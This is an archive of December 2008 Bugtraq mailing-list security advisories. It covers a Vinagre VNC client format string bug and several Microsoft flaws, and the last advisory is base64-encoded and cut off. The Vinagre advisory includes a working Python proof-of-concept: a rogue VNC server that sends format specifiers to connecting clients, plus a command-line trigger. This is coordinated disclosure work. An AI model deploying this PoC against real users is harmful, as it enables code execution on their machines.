Vinagre show_error() format string vulnerability



1. *Advisory Information*

Title: Vinagre show_error() format string vulnerability
Advisory ID: CORE-2008-1127
Advisory URL: http://www.coresecurity.com/content/vinagre-format-string
Date published: 2008-12-09
Date of last update: 2008-12-09
Vendors contacted: Vinagre team
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Format string
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32682
CVE Name: N/A


3. *Vulnerability Description*

Vinagre [1] is a VNC client for the GNOME Desktop. A format string error
has been found on the 'vinagre_utils_show_error()' function that can be
exploited via commands issued from a malicious server containing format
string specifiers on the VNC name.

In a web based attack scenario, the user would be required to connect to
a malicious server. Successful exploitation would then allow the
attacker to execute arbitrary code with the privileges of the Vinagre user.


4. *Vulnerable packages*

   . Vinagre 2.24.1 and previous versions


5. *Non-vulnerable packages*

   . Vinagre 2.24.2


6. *Vendor Information, Solutions and Workarounds*

The Vinagre team has released a fixed version, available at
http://ftp.acc.umu.se/pub/GNOME/sources/vinagre/2.24/vinagre-2.24.2.tar.gz


7. *Credits*

This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*

The function 'vinagre_utils_show_error()' on 'src/vinagre-utils.c' follows:

/-----------

57  void
58  vinagre_utils_show_error (const gchar *message, GtkWindow *parent)
59  {
60    GtkWidget *d;
61
62    d = gtk_message_dialog_new (parent,
63              GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
64              GTK_MESSAGE_ERROR,
65              GTK_BUTTONS_CLOSE,
66              message);
....

- -----------/

 Here, the "message" string is the format specifier for the function
'gtk_message_dialog_new()', but may be controlled by the user in many
ways. The simplest is the invocation of vinagre via a command line, Ex.:

/-----------

~$vinagre %n%n
- -----------/

 But the vulnerability can also be triggered remotely via a malicious
vnc server.


8.1. *Proof Of Concept*

The following python script implements a basic vnc server that triggers
the vulnerability:

/-----------

##
## Gnome Vinagre format string PoC VNC SERVER
##

import socket
import struct

#create an INET, STREAMing socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#bind the socket to a public host,
# and a well-known port
serversocket.bind(("0.0.0.0", 5900))

#become a server socket
serversocket.listen(5)

while 1:
  #accept connections from outside
  (clientsocket, address) = serversocket.accept()
  print "accept"

  # version handshake
  clientsocket.send("RFB 003.008\n")
  resp=clientsocket.recv(100)
  print resp

  # security types (none)
  clientsocket.send("\x01\x01")
  resp=clientsocket.recv(100)
  if resp=="\x01":
    print "security: none"
    clientsocket.send("\x00\x00\x00\x00") #OK
  else: exit(-1)

  # share desktop flag?
  resp=clientsocket.recv(100)

  #framebuffer parameters

clientsocket.send("\x02\xd0\x01\x90\x20\x20\x00\x01\x00\xff\x00\xff\x00\xff\x10\x08\x00\x00\x00\x00\x00\x00\x00\x04%n%n")
#OK

  resp=clientsocket.recv(100)
  clientsocket.close()

- -----------/




9. *Report Timeline*

. 2008-12-01: Core Security Technologies notifies the Vinagre team of
the vulnerability.
. 2008-12-02: Vinagre team asks Core for a technical description of the
vulnerability.
. 2008-12-02: Technical details sent to Vinagre team by Core.
. 2008-12-02: Vinagre team notifies Core this issue has been fixed in
the development branch, and that a new version will be available soon.
. 2008-12-05: Core asks Vinagre team if the new version is available.
. 2008-12-05: Vinagre team releases the Vinagre 2.24.2 version, which
fixes this issue.
. 2008-12-09: The advisory CORE-2008-1127 is published.


10. *References*

[1] http://projects.gnome.org/vinagre/.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPsvQyNibggitWa0RAoZHAJ9RQxrboOG+3oWfK4qH8pMoZEELHgCeOyVJ
bVIpD2b1TEob7GKuEfmBAYs1Hp
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:19:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f80
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38876-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 23E4EEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:11:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 787C21438B6; Tue,  9 Dec 2008 12:46:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27586 invoked from network); 9 Dec 2008 19:59:44 -0000
Message-ID: <493ED229.3010705@idefense.com>
Date: Tue, 09 Dec 2008 15:16:41 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 12.09.08: Microsoft Internet Explorer
 5.01 EMBED tag Long File Name Extension Stack Buffer Overflow Vulnerability
 (iDefense Exclusive)
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 09, 2008

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, please the visit following
website: http://www.microsoft.com/ie/

II. DESCRIPTION

Remote exploitation of a stack buffer overflow vulnerability while
handling specific HTML tags in Microsoft Corp.'s Internet Explorer web
browser allows attackers to execute arbitrary code within the context
of the affected user.

On Internet Explorer 5.01 a function return address can be overwritten
with attacker controlled data which results in an exploitable
condition. However on Internet Explorer 6 the vulnerability will only
overflow one byte. For Internet Explorer 6 on Windows 2000 platform,
the overflowed byte is in a local variable, and overwriting it doesn't
affect program execution at all. For Internet Explorer 6 on Windows XP
SP2, the overflowed byte is in the stack cookie, which causes Internet
Explorer to terminate and only results in a denial of service.

III. ANALYSIS

Successful exploitation of this vulnerability would allow an attacker to
execute arbitrary code in the context of the user running the Internet
Explorer. However, the execution of arbitrary code is only possible on
Windows 2000 SP4 running Internet Explorer 5.01.

Exploitation would require an attacker to persuade a user to visit a
malicious website using Internet Explorer.

IV. DETECTION

As of September 2008, iDefense confirms that Internet Explorer 5.01 on
Windows 2000 SP4, is vulnerable. It also causes denial of service for
Internet Explorer 6 on Windows XP SP2. Internet Explorer 7 is not
affected.

V. WORKAROUND

iDefense is not aware of any effective workaround for this issue.
Customers are encouraged to upgrade Internet Explorer to version 6 or
above.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx

Microsoft recommends that customers apply the update immediately.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4261 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/26/2008  Initial Vendor Notification
08/26/2008  Initial Vendor Reply
09/24/2008  Additional Vendor Feedback
12/02/2008  Additional Vendor Feedback
12/09/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Jun Mao of iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
~ There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPtIpbjs6HoxIfBkRApYJAJ9B8COXgvssiyBHgd6YEkv33SXFvwCfWCE4
fQbwagRXx5qH82/+HnnqCeA=Z/LM
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:29:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f81
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38878-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BFE28EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:21:42 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6ED2D236F41; Tue,  9 Dec 2008 14:08:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28412 invoked from network); 9 Dec 2008 20:33:48 -0000
Message-ID: <493EDA1F.3040204@idefense.com>
Date: Tue, 09 Dec 2008 15:50:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 12.09.08: Microsoft Windows Graphics Device
 Interface Integer Overflow Vulnerability
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 12.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 09, 2008

I. BACKGROUND

Microsoft Windows graphics device interface (GDI) enables applications
to use graphics and formatted text on both the video display and the
printer. For more information about GDI, please visit the following Web
page: http://msdn2.microsoft.com/en-us/library/ms536795.aspx

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple
versions of Microsoft Corp.'s Windows operating system could allow an
attacker to execute arbitrary code with the privileges of the current
user.

This vulnerability exists in the way GDI handles integer math. An
integer overflow could occur while calculating the a buffer length,
which results in an undersized heap buffer being allocated. This buffer
is then overflowed with data from the input image file.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code with the
privileges of the current user. Exploitation would require convincing a
targeted user to view a specially crafted image file. An attacker could
host this file on a Web server, attach the file to an e-mail or
embedded the file in an Office document.

This vulnerability also can be triggered through e-mail. If the e-mail
client can automatically display images embedded in the e-mail, the
user only needs to open the e-mail to trigger the vulnerability.
Currently an EMF file is used as a test attack vector. Outlook and
Outlook Express will automatically display EMF images and trigger the
vulnerability. Lotus Notes and Thunderbird do not display EMF images in
e-mail directly, but the vulnerability still can be triggered when
opening or viewing the EMF attachment.

IV. DETECTION

iDefense has confirmed that gdi32.dll file version 5.1.2600.3316, as
included in fully patched Windows XP Service Pack 2 as of May 2008, is
vulnerable. Other versions of Windows are suspected to be vulnerable.

V. WORKAROUND

Turning off metafile processing by modifying the registry mitigates this
threat. Under registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\GRE_Initialize create a DWORD entry "DisableMetaFiles"
and set it to 1.

Note 1: This does not affect processes that are already running, so you
might need to log off and log on again or restart the computer after
making the change. Note 2: It only blocks one attack vector through
Windows metafile. It is possibly to exploit this vulnerability through
other attack vectors.

Impact of Workaround: components relying on metafile processing might
not work properly, such as printing.

Viewing e-mail in plain text format mitigates e-mail-based attack.

VI. VENDOR RESPONSE

"The vulnerability could allow remote code execution if a user opens a
specially crafted WMF image file. An attacker who successfully
exploited this vulnerability could take complete control of an affected
system. An attacker could then install programs; view, change, or delete
data; or create new accounts."

Microsoft Corp. has released a patch which addresses this issue. For
more information, consult their advisory at the following URL.

http://www.microsoft.com/technet/security/Bulletin/ms08-071.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-2249 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/21/2008  Initial Vendor Notification
05/21/2008  Initial Vendor Reply
09/05/2008  Additional Information Provided to Vendor
10/14/2008  Additional Vendor Feedback
12/09/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Jun Mao of iDefense based on a
submission from an anonymous contributor.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
~ There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJPtoebjs6HoxIfBkRAnGcAJ95DE6l5oW0CL7joxrUpQpJEFaJkACgx06g
YVieB4+qBtOPh69TdEd7j8Y=TC3Z
-----END PGP SIGNATURE-----

From - Tue Dec  9 16:29:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f82
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38877-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 060B4EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:24:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 11A6B1438C1; Tue,  9 Dec 2008 12:46:39 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27689 invoked from network); 9 Dec 2008 20:04:21 -0000
Date: Tue, 9 Dec 2008 21:17:03 +0100
Message-Id: <200812092017.mB9KH3wQ005586@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Hierarchical FlexGrid Control Integer Overflows
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 09/12/2008

     - Microsoft Hierarchical FlexGrid Control Integer Overflows -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

=====================================================================1) Affected Software 

* Microsoft Hierarchical FlexGrid Control 6.0.88.4

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================3) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in Microsoft
Hierarchical FlexGrid Control bundled with various products, which can
be exploited by malicious people to compromise a user's system.

The vulnerabilities are caused due to integer overflow errors in the 
ActiveX control (mshflxgd.ocx) when handling the "Rows" and "Cols" 
properties and the "ExpandAll()" and "CollapseAll()" methods. These
can be exploited to corrupt memory.

Successful exploitation allows execution of arbitrary code.

=====================================================================4) Solution 

Apply patches from MS08-070.

=====================================================================5) Time Table 

28/08/2007 - Vendor notified.
28/08/2007 - Vendor response.
26/09/2007 - Additional information provided and status update 
             requested.
26/09/2007 - Vendor informs that status update will be provided soon.
10/10/2007 - Vendor provides status update.
23/11/2007 - Status update requested.
24/11/2007 - Vendor provides status update.
15/08/2008 - Status update requested.
09/09/2008 - Status update requested.
26/09/2008 - Status update requested and vendor informed that 
             advisory will be published in a week if no status update
             is provided.
29/09/2008 - Vendor provides status update.
31/10/2008 - Vendor provides status update (targeted for November).
07/11/2008 - Vendor provides status update (targeted for December).
05/12/2008 - Vendor provides status update (on track for December).
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================6) Credits 

Discovered by Carsten Eiram, Secunia Research.

=====================================================================7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4254 for the vulnerability.

MS08-070 (KB932349):
http://www.microsoft.com/technet/security/Bulletin/MS08-070.mspx

=====================================================================8) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-72/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 16:39:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f83
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38879-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5D15CEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:33:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C80D7236F69; Tue,  9 Dec 2008 14:08:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29315 invoked from network); 9 Dec 2008 20:50:36 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-083: Microsoft Animation ActiveX Control Malformed AVI Parsing Code
 Execution Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF4203AD0F.2664922A-ON8825751A.0073FAA8-8625751A.007408B8@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:07:25 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:07:28 PM,
Serialize complete at 12/09/2008 01:07:28 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4MzogTWljcm9zb2Z0IEFuaW1hdGlvbiBBY3RpdmVYIENvbnRyb2wgTWFsZm9ybWVk
IEFWSSBQYXJzaW5nIENvZGUgDQpFeGVjdXRpb24gVnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56
ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDgtMDgzDQpEZWNlbWJlciA5LCAy
MDA4DQoNCi0tIENWRSBJRDoNCkNWRS0yMDA4LTQyNTUNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoN
Ck1pY3Jvc29mdA0KDQotLSBBZmZlY3RlZCBQcm9kdWN0czoNCk1pY3Jvc29mdCBXaW5kb3dzIFhQ
DQoNCi0tIFRpcHBpbmdQb2ludChUTSkgSVBTIEN1c3RvbWVyIFByb3RlY3Rpb246DQpUaXBwaW5n
UG9pbnQgSVBTIGN1c3RvbWVycyBoYXZlIGJlZW4gcHJvdGVjdGVkIGFnYWluc3QgdGhpcw0KdnVs
bmVyYWJpbGl0eSBieSBEaWdpdGFsIFZhY2NpbmUgcHJvdGVjdGlvbiBmaWx0ZXIgSUQgNjUzOS4g
DQpGb3IgZnVydGhlciBwcm9kdWN0IGluZm9ybWF0aW9uIG9uIHRoZSBUaXBwaW5nUG9pbnQgSVBT
LCB2aXNpdDoNCg0KICAgIGh0dHA6Ly93d3cudGlwcGluZ3BvaW50LmNvbQ0KDQotLSBWdWxuZXJh
YmlsaXR5IERldGFpbHM6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgYWxsb3dzIHJlbW90ZSBhdHRhY2tl
cnMgdG8gZXhlY3V0ZSBhcmJpdHJhcnkgY29kZQ0KdGhyb3VnaCB2dWxuZXJhYmxlIGluc3RhbGxh
dGlvbnMgb2YgTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyLiBVc2VyDQppbnRlcmFjdGlvbiBp
cyByZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eSBpbiB0aGF0IHRoZSB0YXJn
ZXQNCm11c3QgdmlzaXQgYSBtYWxpY2lvdXMgcGFnZS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhp
c3RzIHdpdGhpbiB0aGUgTWljcm9zb2Z0IEFuaW1hdGlvbiBBY3RpdmVYIGNvbnRyb2wNCk1TQ09N
Q1QyLk9DWC4gV2hlbiBwYXJzaW5nIGEgbWFsZm9ybWVkIEFWSSBmaWxlIHRocm91Z2ggdGhpcyBj
b250cm9sIGFuDQpleHBsb2l0YWJsZSBoZWFwIGNvcnJ1cHRpb24gY2FuIG9jY3VyLiBBcyB0aGUg
QVZJIGZpbGUgY2FuIGJlIGxvYWRlZA0Kb3ZlciBhIFVOQyBwYXRoIHRoaXMgaXNzdWUgaXMgcmVt
b3RlbHkgZXhwbG9pdGFibGUgYW5kIGNhbiByZXN1bHQgaW4NCmFyYml0cmFyeSBjb2RlIGV4ZWN1
dGlvbiB1bmRlciB0aGUgY29udGV4dCBvZiB0aGUgY3VycmVudCB1c2VyLg0KDQotLSBWZW5kb3Ig
UmVzcG9uc2U6DQpNaWNyb3NvZnQgaGFzIGlzc3VlZCBhbiB1cGRhdGUgdG8gY29ycmVjdCB0aGlz
IHZ1bG5lcmFiaWxpdHkuIE1vcmUNCmRldGFpbHMgY2FuIGJlIGZvdW5kIGF0Og0KDQpodHRwOi8v
d3d3Lm1pY3Jvc29mdC5jb20vdGVjaG5ldC9zZWN1cml0eS9idWxsZXRpbi9NUzA4LTA3MC5tc3B4
DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6DQoyMDA4LTA5LTE2IC0gVnVsbmVyYWJpbGl0eSBy
ZXBvcnRlZCB0byB2ZW5kb3INCjIwMDgtMTItMDkgLSBDb29yZGluYXRlZCBwdWJsaWMgcmVsZWFz
ZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGRpc2Nv
dmVyZWQgYnk6DQogICAgKiBDSGtyX0Q1OTENCg0KLS0gQWJvdXQgdGhlIFplcm8gRGF5IEluaXRp
YXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQsIFRoZSBaZXJvIERheSBJ
bml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qtb2YtYnJlZWQgbW9kZWwgZm9yIHJl
d2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2libHkNCmRpc2Nsb3Npbmcg
ZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2VhcmNoZXJzIGludGVyZXN0ZWQgaW4g
Z2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaA0KdGhyb3VnaCB0aGUgWkRJ
IGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24tdXAgYXQ6DQoNCiAgICBodHRwOi8v
d3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJIGlzIHVuaXF1ZSBpbiBob3cgdGhl
IGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gaXMNCnVzZWQuIFRpcHBpbmdQb2lu
dCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFpbHMgb3IgYW55DQpleHBs
b2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRoZSBhZmZlY3RlZCBwcm9kdWN0IHZl
bmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3VzdG9tZXJzIHdpdGggemVybyBkYXkg
cHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHByZXZlbnRpb24gdGVjaG5vbG9neS4g
RXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVjaWZpY3Mgb2YgdGhlIHZ1bG5lcmFi
aWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVzIHVudGlsDQphbiBvZmZpY2lhbCB2
ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBGdXJ0aGVybW9yZSwgd2l0aCB0aGUN
CmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJlIGEgYnJvYWRlciB1c2VyIGJhc2Us
IFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGNv
bmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChpbmNsdWRpbmcgY29tcGV0aXRvcnMp
IHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9uIG9yDQptaXRpZ2F0aW9uIHByb2R1
Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUgcG9saWN5IGlzIGF2YWlsYWJsZSBv
bmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbS9hZHZpc29y
